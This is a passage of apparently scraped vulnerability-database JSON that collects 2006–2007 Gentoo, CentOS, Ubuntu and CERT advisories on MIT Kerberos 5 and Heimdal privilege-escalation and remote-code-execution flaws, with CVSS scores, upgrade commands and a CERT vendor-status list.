\">=app-crypt/mit-krb5-1.5.2-r1\"", "cvss3": {}, "published": "2007-04-03T00:00:00", "type": "gentoo", "title": "MIT Kerberos 5: Arbitrary remote code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-04-03T00:00:00", "id": "GLSA-200704-02", "href": "https://security.gentoo.org/glsa/200704-02", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T15:02:08", "description": "### Background\n\nHeimdal is a free implementation of Kerberos 5. \n\n### Description\n\nThe ftpd and rcp applications provided by Heimdal fail to check the return value of calls to seteuid(). \n\n### Impact\n\nA local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Heimdal users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-crypt/heimdal-0.7.2-r3\"", "cvss3": {}, "published": "2006-08-23T00:00:00", "type": "gentoo", "title": "Heimdal: Multiple local privilege escalation vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2006-08-23T00:00:00", "id": "GLSA-200608-21", "href": "https://security.gentoo.org/glsa/200608-21", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T15:02:08", "description": "### Background\n\nMIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. \n\n### Description\n\nUnchecked calls to setuid() in krshd and v4rcp, as well as unchecked calls to seteuid() in kftpd and in ksu, have been found in the MIT Kerberos 5 program suite and may lead to a local root privilege escalation. \n\n### Impact\n\nA local attacker could exploit this vulnerability to execute arbitrary code with elevated privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll MIT Kerberos 5 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-crypt/mit-krb5-1.4.3-r3\"", "cvss3": {}, "published": "2006-08-10T00:00:00", "type": "gentoo", "title": "MIT Kerberos 5: Multiple local privilege escalation vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2006-08-10T00:00:00", "id": "GLSA-200608-15", "href": "https://security.gentoo.org/glsa/200608-15", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2023-05-28T15:06:05", "description": "**CentOS Errata and Security Advisory** CESA-2007:0095\n\n\nKerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found in the username handling of the MIT krb5 telnet daemon\r\n(telnetd). A remote attacker who can access the telnet port of a target\r\nmachine could log in as root without requiring a password. (CVE-2007-0956)\r\n\r\nNote that the krb5 telnet daemon is not enabled by default in any version\r\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\r\nremote access to the telnet port. This flaw does not affect the telnet\r\ndaemon distributed in the telnet-server package.\r\n\r\nFor users who have enabled the krb5 telnet daemon and have it accessible\r\nremotely, this update should be applied immediately. \r\n\r\nWhilst we are not aware at this time that the flaw is being actively\r\nexploited, we have confirmed that the flaw is very easily exploitable.\r\n\r\nThis update also fixes two additional security issues:\r\n\r\nBuffer overflows were found which affect the Kerberos KDC and the kadmin\r\nserver daemon. A remote attacker who can access the KDC could exploit this\r\nbug to run arbitrary code with the privileges of the KDC or kadmin server\r\nprocesses. (CVE-2007-0957)\r\n\r\nA double-free flaw was found in the GSSAPI library used by the kadmin\r\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\r\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux\r\n4 and 5 successful exploitation of this issue can only lead to a denial of\r\nservice. Applications which use this library in earlier releases of Red\r\nHat Enterprise Linux may also be affected. (CVE-2007-1216)\r\n\r\nAll users are advised to update to these erratum packages which contain a\r\nbackported fix to correct these issues.\r\n\r\nRed Hat would like to thank MIT and iDefense for reporting these\r\nvulnerabilities.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063113.html\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063114.html\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063117.html\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063119.html\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063120.html\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063123.html\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063131.html\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063132.html\n\n**Affected packages:**\nkrb5\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2007:0095", "cvss3": {}, "published": "2007-04-03T21:56:56", "type": "centos", "title": "krb5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-04-06T17:43:39", "id": "CESA-2007:0095", "href": "https://lists.centos.org/pipermail/centos-announce/2007-April/063113.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T15:06:08", "description": "**CentOS Errata and Security Advisory** CESA-2007:0095-01\n\n\nKerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found in the username handling of the MIT krb5 telnet daemon\r\n(telnetd). A remote attacker who can access the telnet port of a target\r\nmachine could log in as root without requiring a password. (CVE-2007-0956)\r\n\r\nNote that the krb5 telnet daemon is not enabled by default in any version\r\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\r\nremote access to the telnet port. This flaw does not affect the telnet\r\ndaemon distributed in the telnet-server package.\r\n\r\nFor users who have enabled the krb5 telnet daemon and have it accessible\r\nremotely, this update should be applied immediately. \r\n\r\nWhilst we are not aware at this time that the flaw is being actively\r\nexploited, we have confirmed that the flaw is very easily exploitable.\r\n\r\nThis update also fixes two additional security issues:\r\n\r\nBuffer overflows were found which affect the Kerberos KDC and the kadmin\r\nserver daemon. A remote attacker who can access the KDC could exploit this\r\nbug to run arbitrary code with the privileges of the KDC or kadmin server\r\nprocesses. (CVE-2007-0957)\r\n\r\nA double-free flaw was found in the GSSAPI library used by the kadmin\r\nserver daemon. Red Hat Enterprise Linux 4 and 5 contain checks within\r\nglibc that detect double-free flaws. Therefore, on Red Hat Enterprise Linux\r\n4 and 5 successful exploitation of this issue can only lead to a denial of\r\nservice. Applications which use this library in earlier releases of Red\r\nHat Enterprise Linux may also be affected. (CVE-2007-1216)\r\n\r\nAll users are advised to update to these erratum packages which contain a\r\nbackported fix to correct these issues.\r\n\r\nRed Hat would like to thank MIT and iDefense for reporting these\r\nvulnerabilities.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2007-April/063124.html\n\n**Affected packages:**\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n", "cvss3": {}, "published": "2007-04-04T00:33:54", "type": "centos", "title": "krb5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-04-04T00:33:54", "id": "CESA-2007:0095-01", "href": "https://lists.centos.org/pipermail/centos-announce/2007-April/063124.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T15:07:03", "description": "**CentOS Errata and Security Advisory** CESA-2006:0612\n\n\nKerberos is a network authentication system which allows clients and\r\nservers to authenticate to each other through use of symmetric encryption\r\nand a trusted third party, the KDC.\r\n\r\nA flaw was found where some bundled Kerberos-aware applications would fail\r\nto check the result of the setuid() call. On Linux 2.6 kernels, the\r\nsetuid() call can fail if certain user limits are hit. A local attacker\r\ncould manipulate their environment in such a way to get the applications to\r\ncontinue to run as root, potentially leading to an escalation of\r\nprivileges. (CVE-2006-3083).\r\n\r\nUsers are advised to update to these erratum packages which contain a\r\nbackported fix to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2006-August/062604.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-August/062605.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-August/062606.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-August/062608.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-August/062609.html\n\n**Affected packages:**\nkrb5\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2006:0612", "cvss3": {}, "published": "2006-08-09T10:57:14", "type": "centos", "title": "krb5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083"], "modified": "2006-08-10T17:30:56", "id": "CESA-2006:0612", "href": "https://lists.centos.org/pipermail/centos-announce/2006-August/062604.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-05-28T17:20:07", "description": "## Releases\n\n * Ubuntu 6.10 \n * Ubuntu 6.06 \n * Ubuntu 5.10 \n\nThe krb5 telnet service did not appropriately verify user names. A \nremote attacker could log in as the root user by requesting a specially \ncrafted user name. (CVE-2007-0956)\n\nThe krb5 syslog library did not correctly verify the size of log \nmessages. A remote attacker could send a specially crafted message and \nexecute arbitrary code with root privileges. (CVE-2007-0957)\n\nThe krb5 administration service was vulnerable to a double-free in the \nGSS RPC library. A remote attacker could send a specially crafted \nrequest and execute arbitrary code with root privileges. (CVE-2007-1216)\n", "cvss3": {}, "published": "2007-04-04T00:00:00", "type": "ubuntu", "title": "krb5 vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2007-04-04T00:00:00", "id": "USN-449-1", "href": "https://ubuntu.com/security/notices/USN-449-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:20:18", "description": "## Releases\n\n * Ubuntu 6.06 \n * Ubuntu 5.10 \n * Ubuntu 5.04 \n\nMichael Calmer and Marcus Meissner discovered that several krb5 tools \ndid not check the return values from setuid() system calls. On systems \nthat have configured user process limits, it may be possible for an \nattacker to cause setuid() to fail via resource starvation. In that \nsituation, the tools will not reduce their privilege levels, and will \ncontinue operation as the root user.\n\nBy default, Ubuntu does not ship with user process limits.\n\nPlease note that these packages are not officially supported by Ubuntu \n(they are in the 'universe' component of the archive).\n", "cvss3": {}, "published": "2006-08-16T00:00:00", "type": "ubuntu", "title": "krb5 vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3083", "CVE-2006-3084"], "modified": "2006-08-16T00:00:00", "id": "USN-334-1", "href": "https://ubuntu.com/security/notices/USN-334-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:20:18", "description": "## Releases\n\n * Ubuntu 6.06 \n\nVarious flaws have been reported that allow an attacker to execute \narbitrary code with user privileges by tricking the user into opening \na malicious email containing JavaScript. Please note that JavaScript \nis disabled by default for emails, and it is not recommended to enable \nit. (CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, \nCVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3810, \nCVE-2006-3811, CVE-2006-3812)\n\nA buffer overflow has been discovered in the handling of .vcard files. \nBy tricking a user into importing a malicious vcard into his contacts, \nthis could be exploited to execute arbitrary code with the user's \nprivileges. (CVE-2006-3084)\n\nThe \"enigmail\" plugin has been updated to work with the new \nThunderbird version.\n", "cvss3": {}, "published": "2006-07-29T00:00:00", "type": "ubuntu", "title": "Thunderbird vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-3084", "CVE-2006-3113", "CVE-2006-3802", "CVE-2006-3803", "CVE-2006-3804", "CVE-2006-3805", "CVE-2006-3806", "CVE-2006-3807", "CVE-2006-3809", "CVE-2006-3810", "CVE-2006-3811", "CVE-2006-3812"], "modified": "2006-07-29T00:00:00", "id": "USN-329-1", "href": "https://ubuntu.com/security/notices/USN-329-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2023-05-28T14:35:15", "description": "### Overview\n\nPrivilege escalation vulnerabilities in MIT krb5 krshd and v4rcp may allow an authenticated attacker to execute arbitrary code.\n\n### Description\n\nThe MIT krb 5 [krshd](<http://www.die.net/doc/linux/man/man8/kshd.8.html>) and [v4rcp](<http://www.die.net/doc/linux/man/man1/v4rcp.1.html>) programs contain multiple privilege escalation vulnerabilities. MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>) states that the vulnerabilities \"...result when the OS implementations of `setuid()` or `seteuid()` can fail due to resource exhaustion when changing to an unprivileged user ID.\"\n\nFrom MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>): \n \n_The following vulnerabilities may result from unchecked calls to setuid(), and are believed to only exist on Linux and AIX:_ \n\n\n * _Unchecked calls to setuid() in krshd may allow a local privilege escalation leading to execution of programs as root._\n * _Unchecked calls to setuid() in the v4rcp may allow a local privilege escalation leading to reading, writing, or creating files as root. v4rcp is the remote end of a krb4-authenticated rcp operation, but may be executed directly by an attacker, as it is a setuid program._ \n--- \n \n### Impact\n\nAn authenticated, remote attacker may be able to execute arbitrary code with root privileges. \n \n--- \n \n### Solution\n\n**Apply a patch or upgrade**From MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>): \"The upcoming krb5-1.5.1 and krb5-1.4.4 releases will include fixes for these vulnerabilities.\" MIT has also released patches for krb 5-1.5 and krb5-1.4.3. See the Systems Affected section of this document for information about specific vendors. \n \n--- \n \n \n**Disable vulnerable programs** \n \nFrom MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>): \"Disable `krshd` and `v4rcp`, and remove the setuid bit from the `ksu` binary and the `ftpd` binary.\" \n \n--- \n \n### Vendor Information\n\n580124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Gentoo Linux __ Affected\n\nNotified: July 28, 2006 Updated: August 16, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee Gentoo Linux [Security Advisory GLSA 200608-15](<http://www.gentoo.org/security/en/glsa/glsa-200608-15.xml>) for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23580124 Feedback>).\n\n### IBM Corporation __ Affected\n\nNotified: August 08, 2006 Updated: August 08, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nKerberos is available for AIX via Network Authentication Service. Network Authentication Service is not affected by the issues mentioned in CERT Vulnerability Notes VU#580124 (CVE-2006-3083) and VU#401660 (CVE-2006-3084).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MIT Kerberos Development Team __ Affected\n\nUpdated: August 08, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see MIT krb5 Security Advisory [2006-001](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2006-001-setuid.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23580124 Feedback>).\n\n### Apple Computer, Inc. __ Not Affected\n\nNotified: July 28, 2006 Updated: August 18, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nMac OS X and Mac OS X Server are not susceptible to the issues described in this vulnerability note.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AttachmateWRQ, Inc. __ Not Affected\n\nNotified: July 28, 2006 Updated: August 23, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNo versions of the Attachmate Reflection Kerberos Client are subject to these privilege escalation vulnerabilities. The Reflection Kerberos Client is not based on the MIT code base and runs only on Microsoft Windows operating systems.\n\nFor the latest Attachmate security update information, Attachmate recommends you regularly check the Security Updates and Reflection web page at: <http://support.wrq.com/techdocs/1708.html>.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: July 28, 2006 Updated: August 08, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nJuniper Networks products are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### CyberSafe, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux __ Unknown\n\nNotified: July 28, 2006 Updated: August 24, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee [Debian Security Advisory DSA-1146-1](<http://www.us.debian.org/security/2006/dsa-1146>) for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23580124 Feedback>).\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Heimdal Kerberos Project Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### KTH Kerberos Team Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. __ Unknown\n\nNotified: July 28, 2006 Updated: August 24, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee Mandrivia advisory [MDKSA-2006:139](<http://www.mandriva.com/security/advisories?name=MDKSA-2006:139>) for more details. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23580124 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: July 28, 2006 Updated: July 28, 2006 